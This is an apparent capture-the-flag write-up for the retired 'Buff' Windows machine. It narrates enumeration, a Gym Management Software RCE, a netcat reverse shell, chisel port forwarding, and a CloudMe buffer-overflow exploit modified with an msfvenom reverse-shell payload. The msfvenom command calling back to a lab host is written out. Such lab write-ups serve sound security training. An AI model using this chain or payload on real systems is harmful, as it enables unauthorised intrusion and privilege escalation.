Buff machine is a vulnerable machine with Windows operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Full Port Scan
As a result of port scanning, ports 7680/tcp pando-pub and 8080/tcp http Apache 2.4.43 are open.
We provide enumeration on port 8080.
We did not get any results in the source code, but if we look at its general appearance, we understand that it is a website about Fitness.
We scan with gobuster for hidden files and directories.
We didn’t find anything in the scan result.
Continue enumeration from the web interface
Made using Gym Management Software 1.0, let’s search if there is a vulnerability related to it
We’ve seen the RCE vulnerability here. Let’s pull this into our local machine and see
There is nothing we can change on the code, let’s use it.
gave us Shell on user buff\shaun
here but we can’t get a stable Shell, we can’t change directories etc.
Let’s install nc here and try to give ourselves a stable shel
here when we give our smbshare without password, it did not accept it, we cannot use it in powershelli
Therefore we will create a password username with smbshare.
We successfully copied the nc
Now it’s time to run nc and get revershell
We have our shell, we have obtained the user flag, but we cannot access the administrtor folder, so we continue local enumuraion.
Here we understand that CloudMe_1112.exe is running inside.
(CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software).
Let’s see if there is a vulnerability related to this
We have seen that there are vulnerabilities with the same version of CloudMe exe’s name, but they are python, but I need python in windows to use them, but it does not come by default in windows, so we will use port forwarding management.
We transferred the chisel to the target machine
Let’s do port forwarding from Chisel
We have done our port forwarding and now it is time to list the exploits belonging to CloudMe.
Here we’ll download the PoC exploit and edit it.
As you can see here it opens the calculator and we want something more, namely to give us revershell.
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4700 -b ‘\x00\x0A\x0D’ -f python -v payload
here we create with msfvenom
We update the existing exploit. We use the payload we got.
I’ll add the payload and put Shell on standby.
And we got Shell from the administrator user
This is how we got our root flag.